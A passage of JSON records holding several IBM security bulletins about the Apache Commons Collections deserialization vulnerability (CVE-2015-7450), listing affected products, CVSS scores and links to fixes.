shipped as a component of WebSphere Remote Server. 
Information about a security vulnerability affecting WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nFor vulnerability details, see the security bulletin [**_Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450) _**](<http://www.ibm.com/support/docview.wss?uid=swg21970575>)**.**\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product and Version(s) \n---|--- \nWebSphere Remote Server \n7.0, 7.1, 7.1.1, 7.1.2, 8.5| WebSphere Application Server \n7.0, 8.0, 8.5, 8.5.5 \n \n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-15T07:04:13", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in WebSphere Application Server shipped with WebSphere Remote Server (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-15T07:04:13", "id": "13C3D53BA54035028BA8B6CCC92D57C0C0AFB5754F2A746073C2E64512AF302A", "href": "https://www.ibm.com/support/pages/node/272407", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, 
{"lastseen": "2023-02-13T01:34:23", "description": "## Summary\n\nMultiple N series products incorporate the Apache Commons Collection library. Versions of Apache Commons Collection before 3.2.2 and including 4.0 are susceptible to a vulnerability that could be exploited to allow remote attackers to execute arbitrary commands on the system. Multiple N series products has addressed the applicable CVEs.\n\n## Vulnerability Details\n\nCVEID: CVE-2015-7450 \nDESCRIPTION: Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/107918> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nN series Snap Creator Framework: 3.6.0, 4.1.0, 4.1.2, 4.3; \nSnapManager for Oracle: 3.2, 3.3, 3.3.1, 3.4; \nSnapManager for SAP: 3.2, 3.3, 3.3.1; \nVirtual Storage Console for VMware vSphere: 6.0, 6.1, 6.2;\n\n## Remediation/Fixes\n\nFor N series Snap Creator Framework: the fix exists from microcode version 4.3P1; \nFor SnapManager for Oracle: the fix exists from microcode version 3.4P2; \nFor SnapManager for SAP: the fix exists from microcode version 3.4P2; \nFor Virtual Storage Console for VMware vSphere: the fix exists from microcode version: 6.2.1; \nPlease contact IBM support or go to this [_link_](<https://www-945.ibm.com/support/fixcentral/>) to download a supported release.\n\n## Workarounds and Mitigations\n\nNone.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": 
"HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-18T00:28:37", "type": "ibm", "title": "Security Bulletin: Apache Commons Collection Java Deserialization Vulnerability in Multiple N series Products", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-18T00:28:37", "id": "C03FA5EBB009D6B1F8AADC24B78B9ABD8ADACBA78E030EBADE0D37E5B4B8531B", "href": "https://www.ibm.com/support/pages/node/696467", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:53:08", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by FSM.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>)** \nDESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. 
\nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n## Affected Products and Versions\n\nFlex System Manager 1.3.4.x \nFlex System Manager 1.3.3.x \nFlex System Manager 1.3.2.x\n\n## Remediation/Fixes\n\nIBM recommends updating the FSM using the instructions referenced in this table. \n \n\n\nProduct | \n\nVRMF | \n\nAPAR | \n\nRemediation \n---|---|---|--- \nFlex System Manager| \n\n1.3.4.x | \n\nIT12598\n\n| Install [fsmfix_1.3.4.0_IT12598_IT15244_IT15245](<http://www-933.ibm.com/support/fixcentral/systemx/selectFix?product=ibm%2Fsystemx%2F8731&fixids=fsmfix1.3.4.0_IT12598_IT15244_IT15245&function=fixId&parent=Flex%20System%20Manager%20Node>) \nFlex System Manager| \n\n1.3.3.x | \n\nIT12598\n\n| Install [fsmfix_1.3.3.0_IT12598_IT15244_IT15245](<http://www-933.ibm.com/support/fixcentral/systemx/selectFix?product=ibm%2Fsystemx%2F8731&fixids=fsmfix1.3.3.0_IT12598_IT15244_IT15245&function=fixId&parent=Flex%20System%20Manager%20Node>) \nFlex System Manager| \n\n1.3.2.x | \n\nIT12598\n\n| Install [fsmfix_1.3.2.0_IT12598_IT15244_IT15245](<http://www-933.ibm.com/support/fixcentral/systemx/selectFix?product=ibm%2Fsystemx%2F8731&fixids=fsmfix1.3.2.0_IT12598_IT15244_IT15245&function=fixId&parent=Flex%20System%20Manager%20Node>) \nFor 1.1.x.x, 1.2.x.x, 1.3.0.x and 1.3.1.x IBM recommends upgrading to a fixed, supported version/release of the product. 
\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-18T01:32:21", "type": "ibm", "title": "Security Bulletin: A vulnerability in Apache Commons affects IBM Flex System Manager(FSM) (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-18T01:32:21", "id": "06457DA2FE08EC56407EF05C2EAAA9080634D44807C2A8ABBDEA18DCD9364BAC", "href": "https://www.ibm.com/support/pages/node/628965", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:54:42", "description": "## Summary\n\nWebSphere Service Registry and Repository and WebSphere Application Server are shipped as a component of IBM SOA Policy Gateway Pattern for AIX Server 2.5 and IBM SOA Policy Gateway Pattern for Red Hat Enterprise Linux Server. Information about a security vulnerability affecting WebSphere Service Registry and Repository and WebSphere Application Server have been published in security bulletins. 
\n\n## Vulnerability Details\n\nPlease consult these security bulletins: \n \n[Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Service Registry and Repository (CVE-2015-7450)](<http://www.ibm.com/support/docview.wss?uid=swg21971580>) \n \n[Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)](<http://www.ibm.com/support/docview.wss?uid=swg21970575>) \n \nfor vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nIBM SOA Policy Gateway Pattern for AIX Server 2.5 \nIBM SOA Policy Gateway Pattern for Red Hat Enterprise Linux Server 2.5 \nIBM SOA Policy Gateway Pattern for Red Hat Enterprise Linux Server 2.0 \n \nAll affected by WebSphere Service Registry and Repository V8.0 and WebSphere Application Server V8.0\n\n## Remediation/Fixes\n\nNone\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-15T07:04:15", "type": "ibm", "title": "Security Bulletin: Vulnerabilities identified in WebSphere Service Registry and Repository and WebSphere Application Server shipped with IBM SOA Policy Gateway Pattern for AIX Server and Red Hat Enterprise Linux Server (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", 
"version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-15T07:04:15", "id": "3EF919878669EE41DD08409B9AA0E2DAA0F0DBC40CFE18712D5924A93F1806CF", "href": "https://www.ibm.com/support/pages/node/273483", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:40:55", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by Rational Business Developer.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. 
\n \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nRational Business Developer: 8.5 - 9.5\n\n## Remediation/Fixes\n\n_Product_| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \nRational Business Developer| 9.5.x| none| [http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7ERational&product=ibm/Rational/Rational+Business+Developer&release=9.5.0&platform=All&function=fixId&fixids=Rational-RBD95-CVE-2015-7450-ifix&includeSupersedes=0&source=fc](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7ERational&product=ibm/Rational/Rational+Business+Developer&release=9.5.0&platform=All&function=fixId&fixids=Rational-RBD95-CVE-2015-7450-ifix&includeSupersedes=0&source=fc>) \nRational Business Developer| 9.1.x| none| [http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7ERational&product=ibm/Rational/Rational+Business+Developer&release=9.1.0&platform=All&function=fixId&fixids=Rational-RBD91-CVE-2015-7450-ifix&includeSupersedes=0&source=fc](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7ERational&product=ibm/Rational/Rational+Business+Developer&release=9.1.0&platform=All&function=fixId&fixids=Rational-RBD91-CVE-2015-7450-ifix&includeSupersedes=0&source=fc>) \nRational Business Developer| 9.0.x| none| 
[http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7ERational&product=ibm/Rational/Rational+Business+Developer&release=9.0.1&platform=All&function=fixId&fixids=Rational-RBD90-CVE-2015-7450-ifix&includeSupersedes=0&source=fc](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7ERational&product=ibm/Rational/Rational+Business+Developer&release=9.0.1&platform=All&function=fixId&fixids=Rational-RBD90-CVE-2015-7450-ifix&includeSupersedes=0&source=fc>) \nRational Business Developer| 8.5.x| none| [http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7ERational&product=ibm/Rational/Rational+Business+Developer&release=8.5.0&platform=All&function=fixId&fixids=Rational-RBD85-CVE-2015-7450-ifix&includeSupersedes=0&source=fc](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7ERational&product=ibm/Rational/Rational+Business+Developer&release=8.5.0&platform=All&function=fixId&fixids=Rational-RBD85-CVE-2015-7450-ifix&includeSupersedes=0&source=fc>) \n\nIBM recommends that you review your entire environment to identify vulnerable \n\n## Workarounds and Mitigations\n\nnone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-03T04:23:43", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects Rational Business Developer (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", 
"integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-08-03T04:23:43", "id": "38EA893B1CB49114E3D8196A772DD2EACB1D68746AC3215F7DC912F30D4B3635", "href": "https://www.ibm.com/support/pages/node/273707", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:52:04", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM InfoSphere Information Server. Information about this security vulnerability has been published in a WebSphere Application Server security bulletin.\n\n## Vulnerability Details\n\nCVEID: [CVE-2015-7450](<https://vulners.com/cve/CVE-2015-7450>) \nDESCRIPTION: Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. 
\nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/107918> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n## Affected Products and Versions\n\nThe following product, running on all supported platforms, is affected: \nIBM InfoSphere Information Server: versions 8.5, 8.7, 9.1, 11.3, and 11.5 \nIBM InfoSphere FastTrack: versions 11.3 and 11.5 \nIBM InfoSphere Business Glossary: versions 8.5, 8.7, and 9.1 \nIBM InfoSphere Metadata Workbench: versions 8.5, 8.7, and 9.1 \nIBM InfoSphere Information Governance Catalog: versions 11.3 and 11.5 \nIBM ISALite for IBM InfoSphere Information Server: versions 8.5, 8.7, 9.1, 11.3, and 11.5\n\n## Remediation/Fixes\n\n**_Product_**\n\n| **_VRMF_**| **_APAR_**| **_Remediation/First Fix_** \n---|---|---|--- \nInfoSphere Information Server, FastTrack, Information Governance Catalog| 11.5| JR54719| \\--Apply IBM InfoSphere Information Server Framework [_Security Patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is115_JR54719_ISF_services_multi>) \n\\--Apply IBM InfoSphere Information Governance Catalog [_Security patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is115_JR54719_IGC_server_client_multi>) \n\\--Apply [_Websphere Application Server fix_](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) PI52103 for V8.5.0.0 through 8.5.5.7 \n\\--Download and install the latest version of [_ISALite_](<http://www.ibm.com/support/docview.wss?uid=swg24022700>) \n\\--Apply FastTrack [_Security Patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is11501_ft_ru1_services_client_multi>) \nInfoSphere 
Information Server, FastTrack, Information Governance Catalog| 11.3| JR54719| \\--Apply IBM InfoSphere Information Server version _11.3.1.2_ \n\\--Apply IBM InfoSphere Information Server Framework [_Security Patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is113_JR54719_ISF_services_multi>) \n\\--Apply IBM InfoSphere Information Governance Catalog [_Security patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is113_JR54719_IGC_server_client_multi>) \n\\--Apply [_Websphere Application Server fix_](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) PI52103 for V8.5.0.0 through 8.5.5.7 \n\\--Download and install the latest version of [_ISALite_](<http://www.ibm.com/support/docview.wss?uid=swg24022700>) \n\\--Apply FastTrack [_Security Patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is11312_JR55455_ft_client_win>) \n \n\\--Before upgrading a 11.3 installation to 11.5, if the security patches above have been applied to the system, the Information Server Framework patch must be uninstalled or the Information Server Framework [JR54719 rollback patch](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is113_rollback_JR54719_ISF_services_multi>) must be installed. Next, complete the upgrade to 11.5. Finally, re-install the Information Server Framework patch (you will have to use '-force' if it was not uninstalled), and install the Information Governance Catalog patch for 11.5. 
\nInfoSphere Information Server, Business Glossary, Metadata Workbench| 9.1| JR54719| \\--Apply IBM InfoSphere Information Server Framework [_Security Patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is91_JR54719_ISF_services_multi>) \n\\--Apply IBM InfoSphere Metadata Workbench [_Security patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is91_JR54719_MWB_server_client_multi>) \n\\--Apply [_Websphere Application Server fix_](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) PI52103 for your installed version \n\\--Download and install the latest version of [_ISALite_](<http://www.ibm.com/support/docview.wss?uid=swg24022700>) \nInfoSphere Information Server, Business Glossary, Metadata Workbench| 8.7| JR54719| \\--Apply IBM InfoSphere Information Server Framework [_Security Patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is87_JR54719_ISF_services_multi>) \n\\--Apply IBM InfoSphere Business Glossary [_Security patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is87_JR54719_BG_server_client_multi>) \n\\--Apply IBM InfoSphere Metadata Workbench [_Security patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is87_JR54719_MWB_server_client_multi>) \n\\--Apply [_Websphere Application Server fix_](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) PI52103 for your installed version \n\\--Download and install the latest version of [_ISALite_](<http://www.ibm.com/support/docview.wss?uid=swg24022700>) \nInfoSphere Information Server, Business 
Glossary, Metadata Workbench, | 8.5| JR54719| \\--Apply IBM InfoSphere Information Server Framework [_Security Patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is85_JR54719_ISF_services_multi>) \n\\--Apply IBM InfoSphere Business Glossary [_Security patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is85_JR54719_BG_server_client_multi>) \n\\--Apply IBM InfoSphere Metadata Workbench [_Security patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is85_JR54719_MWB_server_client_multi>) \n\\--Apply [_Websphere Application Server fix_](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) PI52103 for V7.0.0.0 through 7.0.0.39 \n\\--Download and install the latest version of [_ISALite_](<http://www.ibm.com/support/docview.wss?uid=swg24022700>) \n \nNote: The same fix may be listed under multiple vulnerabilities. Installing the fix addresses all vulnerabilities to which the fix applies. Also, some fixes require installing both a fix pack and a subsequent patch. While the fix pack must be installed first, any additional patches required may be installed in any order. 
\n\n\n_For __IBM InfoSphere Information Server version 8.1 __IBM recommends upgrading to a fixed, supported version/release/platform of the product._\n\nIBM recommends that you review your entire environment to identify vulnerable releases of the open-source Apache Commons Collections and take appropriate mitigation and remediation actions.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-16T13:37:18", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects IBM InfoSphere Information Server (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-16T13:37:18", "id": "8B09C9492941B8B6C6FB844862484437C6E439C77EC2B6E2EA1BC5C87B890DBB", "href": "https://www.ibm.com/support/pages/node/272427", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:54:45", "description": "## Summary\n\nIBM WebSphere Application Server Hypervisor Edition is shipped as a deployable component of IBM Workload Deployer. 
Information about a security vulnerability affecting IBM WebSphere Application Server and IBM WebSphere Application Server Hypervisor Edition has been published in a security bulletin. \n\n## Vulnerability Details\n\nConsult the security bulletin [_Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product and Version \n---|--- \nIBM Workload Deployer 3.1.0.7| IBM WebSphere Application Server Hypervisor Edition7.0 \nIBM WebSphere Application Server Hypervisor Edition 8.0 \n \n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-15T07:04:12", "type": "ibm", "title": "Security Bulletin:A security vulnerability has been identified in IBM WebSphere Application Server shipped with IBM Workload Deployer (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-15T07:04:12", "id": "BBC19469EB9B90D82D15BF345DE6BD2F2984CAE6A5427AAEAFBF0699FD85D085", 
"href": "https://www.ibm.com/support/pages/node/272253", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:47:01", "description": "## Summary\n\nEmbedded Websphere Application Server (eWAS) is shipped as a component of Tivoli Netcool/OMNIbus WebGUI. Information about a security vulnerability affecting eWAS has been published in a security bulletin.\n\n## Vulnerability Details\n\nPlease consult the security bulletin [Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\n**Principal Product and Version(s)**\n\n| **Affected Supporting Product and Version** \n---|--- \nWebGUI 7.3.1 GA and FP| embedded Websphere Application Server 7.0 \nWebGUI 7.4.0 GA and FP| embedded Websphere Application Server 7.0 \n \n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T15:13:17", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in embedded IBM WebSphere Application Server shipped with Tivoli Netcool/OMNIbus WebGUI (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": 
